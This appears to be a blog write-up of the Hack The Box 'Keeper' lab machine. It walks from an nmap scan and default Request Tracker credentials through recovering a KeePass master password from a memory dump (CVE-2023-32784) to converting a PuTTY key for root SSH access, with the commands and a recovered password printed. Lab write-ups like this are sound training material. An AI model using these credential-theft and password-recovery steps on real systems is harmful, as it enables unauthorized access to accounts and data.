In today’s post, we will be going over the Keeper Machine from Hack the Box, Linux machine. Enjoy!
1)As always, we will first start with Nmap scan to see what ports are open on the remote host:
nmap -sC -sV -T4 -p- <TARGET_IP>
Only 2 ports, are open so far, let’s add keep.htb to /etc/hosts and let’s explore the site.
2)Upon navigating the site, it’s clear that we have to add new subdomain —> ticket.keeper.htb, which I did:
And the ticket.keeper.htb looks like this:
3)Right away I try googling for the version displayed on the login screen for possible active exploits, but I didn’t find anything. Instead I tried with default credentials for Request Tracker Software
Thanks, Google! We are in now as an Administrator, let’s see what we can do as an authenticated user.
4)First I was thinking in creating a malicious Script under the Admin -> Scripts, that will be executed when I create a ticket but that didn’t work. Next, I found one interesting ticket (ID 30000) where a customer complained about the crash of keepaass program and she attached a crash dump which I thought may be interesting, but Lise removed the attachment for security reasons as we can see in the screenshot below…
4.1)Next, I continued with enumeration of the app since there is no active exploits at the time being for this version of Request Trucker, and under Admin I saw the Users tab. From there I navigated to the Inorgaard user, where I see Unix login username and very interesting comment, disclosing the password for a new employee, awesome!
5)I gave it a try over SSH (as port 22 is open as well) and boom, we are in and we got user.txt!
6)Interestingly I found a ZIP file that I can unzip on the remote host and then transfer to my machine using wget (and also starting a python server on the remote host python3 -m http.server)
6.1)I see 2 files KeePassDumpFull.dmp & passcodes.kdbx
6.2)The first one, .dmp file is a memory dump that support ticket was about (see screenshots above) since KeePass crashed for a client (KeePass is a Password manager, and quick investigation for it I found out that KeePass is storing Master Password in Memory due to nature of .NET: CVE-2023-32784, https://sysdig.com/blog/keepass-cve-2023-32784-detection/)
6.3)Another file .kdbx is also very interesting as it represents the encrypted database with all usernames and passwords in KeePass: https://sysdig.com/blog/keepass-cve-2023-32784-detection/. I can easily obtain the hash of it by running:
keepass2john passcodes.kdbx
Then, I tried cracking the hash with Hashcat’s module 13400 but that didn’t work out (which means that the Master Password is not in rockyou.txt wordlist)
6.4)Okay, back to the memory dump file, I found this Python script: https://github.com/z-jxy/keepass_dump
And I ran it as:
python3 keepass_dump.py -f ../KeePassDumpFull.dmp --debug --recover
which reveals: [-] Couldn’t verify plaintext match in dump for: dgrd med flde
Here it’s important to mention that retrieving Master Password from the KeePass memory dump will never retrieve the first character, but from here I see that we are missing some more characters than the first one, as dgrd med flde doesn’t make much sense.
Let’s do a Google search for what we have:
That reveals Danish Red Berry Pudding (rødgrød med fløde), interesting! This explains missing characters, as they were recognized because they are not standard characters.
7)So, with the potential password rødgrød med fløde being a master password for the KeyPass we can unlock the keepass database with all the usernames and passwords, that would be passcoded.kdbx. In order to do so I first:
7.1)Downloaded the KeePass itself, by following this video: https://www.youtube.com/watch?v=TIHf-X5rDU4&ab_channel=5-MinuteDevOps —> essentially if you are in Linux Terminal simply run
sudo apt install keepass2
7.2)Then, open the Keepass and upload passed.kdbx file, enter the master password rødgrød med fløde and it works! Amazing
7.3)Now, we can see that in addition to the current user that we have (lnoorgard) we soo root user as well, simply right-click and copy the password (F4><3K0nd!). I tried using su command and ssh as well with this password but it didn’t work, Hm…
7.4)Back to database Enumeration and I see an interesting column: Notes. In the Notes Column for the root account, I see Putty .ppk file. (Putty is essentially for Windows SSH, since we are on Linux we will have to convert it)
7.5)First, by following the article from AWS(https://repost.aws/knowledge-center/ec2-ppk-pem-conversion):
7.5.1)First save Putty .ppk file from the Notes column, like key.ppm using your favorite text Editor
7.5.2)
apt-get install putty-tools
7.5.3)
puttygen key.ppk -O private-openssh -o sshroot.pem
8)Finally, let’s try to initiate the connection with it over the ssh!
ssh -i sshroot.pem root@10.10.11.227
And we are in as root, GG!
Lessons Learned
1)Not every software that we encounter has to have RCE or some other exploit that we have to leverage in other to progress through the machine. For example, here we were dealing with Request Tracker which didn’t have High or Critical Exploit, rather we leveraged default credentials, and with some enumeration, we found an Interesting comment with a password for an initial foothold.2
2)I learned amazing details about the Keepass (How Master Password can be stored in the memory) and possible password cracking by using John the Ripper from .kdbx file. Also, of course, I learned about an amazing CVE-2023-32784.
3)Finally, I learned how to convert the Putty .ppk file to the .pem file which is compatible with SSH (OpenSSH) from a Linux terminal.
Leave a Reply